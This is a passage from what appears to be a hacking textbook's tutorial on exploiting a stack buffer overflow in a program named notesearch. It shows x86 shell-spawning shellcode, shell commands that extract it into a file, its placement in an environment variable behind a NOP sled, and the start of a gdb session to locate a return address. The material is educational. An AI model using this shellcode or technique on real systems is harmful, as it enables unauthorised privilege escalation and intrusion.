Graphics Programs Reference
In-Depth Information
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89
\xe1\xcd\x80
r
eader@hacking:~/booksrc $
The first 10 lines of the program are piped into
grep
, which only shows the
lines that begin with a quotation mark. This isolates the lines containing
the shellcode, which are then piped into
cut
using options to display only the
bytes between two quotation marks.
BASH's for loop can actually be used to send each of these lines to an
echo
command, with command-line options to recognize hex expansion and
to suppress adding a newline character to the end.
reader@hacking:~/booksrc $ for i in $(head exploit_notesearch.c | grep "^\"" | cut -d\" -f2)
> do
> echo -en $i
> done > shellcode.bin
reader@hacking:~/booksrc $ hexdump -C shellcode.bin
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1.1.1......j.XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin..Q..S.|
00000020 e1 cd 80 |...|
00000023
r
eader@hacking:~/booksrc $
Now we have the shellcode in a file called shellcode.bin. This can be used
with command substitution to put shellcode into an environment variable,
along with a generous NOP sled.
reader@hacking:~/booksrc $ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode.bin)
reader@hacking:~/booksrc $ echo $SHELLCODE
1
1
1
j
XQh//shh/bin
Q
S
reader@hacking:~/booksrc $
And just like that, the shellcode is now on the stack in an environment
variable, along with a 200-byte NOP sled. This means we just need to find
an address somewhere in that range of the sled to overwrite the saved return
address with. The environment variables are located near the bottom of the
stack, so this is where we should look when running notesearch in a debugger.
reader@hacking:~/booksrc $ gdb -q ./notesearch
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x804873c
(gdb) run
Starting program: /home/reader/booksrc/notesearch
Breakpoint 1, 0x0804873c in main ()
(gdb)
